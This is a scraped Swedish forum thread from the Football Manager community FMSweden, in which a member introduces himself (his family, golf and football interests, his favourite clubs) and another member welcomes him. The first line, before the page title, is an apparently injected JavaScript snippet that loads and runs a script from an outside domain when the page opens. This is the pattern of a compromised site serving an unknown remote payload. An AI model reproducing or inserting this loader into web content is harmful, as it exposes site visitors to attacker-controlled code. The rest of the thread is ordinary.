;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); JS7 – Hej forumet! – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

JS7

3 Inlägg
2 Users
6 Likes
276 Visningar
JS7
 JS7
(@js7)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 25
Topic starter  

Regga mig på förra sidan 2006 och har under åren hållit en ganska låg profil, bidraget till lite spelartips och rapporter mest. Första spelet jag fastande i var CM 00/01 sedan dess så har man kört på i alla år, så 20 års jubileum med FM-spelande i år. Man har under många år sett spelare på FM som sedan har blivit världsspelare, vilket är sjukt kul när man spelat med personen i spelet innan han blev världskänd.

Är född 88 och är uppvuxen i ett litet samhälle mellan Åtvidaberg och Västervik men som tillhör Småland. Bor sedan 4 år tillbaka i Örebro där jag träffade tjejen för första gången. Träffades faktiskt över tinder och nu sitter man här med dotter och bostad. Friade till tjejen på vår 4 årsdag, sa givetvis ja. Så vi har bestämt att 2022 så blir vi man & hustru.

Är förutom FM-nörd väldigt stor fantast av fotboll såklart men även intresserad av golf som jag började spela när mitt knä strulade 11. Hann spela ner mig till singel där mitt mål var att spela någon form av minitour tävling. Är kanske inte försent men känner väl att det tåget har gått, då all hobby och intresse får mindre tid när man får barn. Fotboll var jag som mest en div 3 spelare innan klubben valde av ekonomiska skäl att börja om 2 serier ner. Sedan min dotter kom har jag även intresserat mig för fotografering där jag driver eget företag vid sidan om mitt vanliga jobb.

Det är bara att hinta till om ni vill veta mer givetvis. Jäkla kul att man är gång igen, saknat att dagligen gått in på fmsweden och kolla vad som händer i vår fmbubbla. Är anhängare av Manchester United, men följer så gott jag kan även Real Madrid och IFK Göteborg. Sedan jag flyttade till Örebro så hoppas jag även att Örebro ska hålla sig kvar i allsvenskan så man kan få se allsvensk fotboll på nära håll.

 

Caio

 

/ JS7

This topic was modified 3 år sedan by JS7

   
Micke reacted
Citera
Sir-Grecco
(@sir-grecco)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
 

Ytterligare ett United fan, välkommen in i värmen! 🙂


   
JS7 reacted
SvaraCitera
JS7
 JS7
(@js7)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 25
Topic starter  

@sir-grecco

 

Tack så mycket ?  ska försöka bidra lite mer från början här ? Fantastiskt med så många likasinnade.


   
Sir-Grecco reacted
SvaraCitera
Share: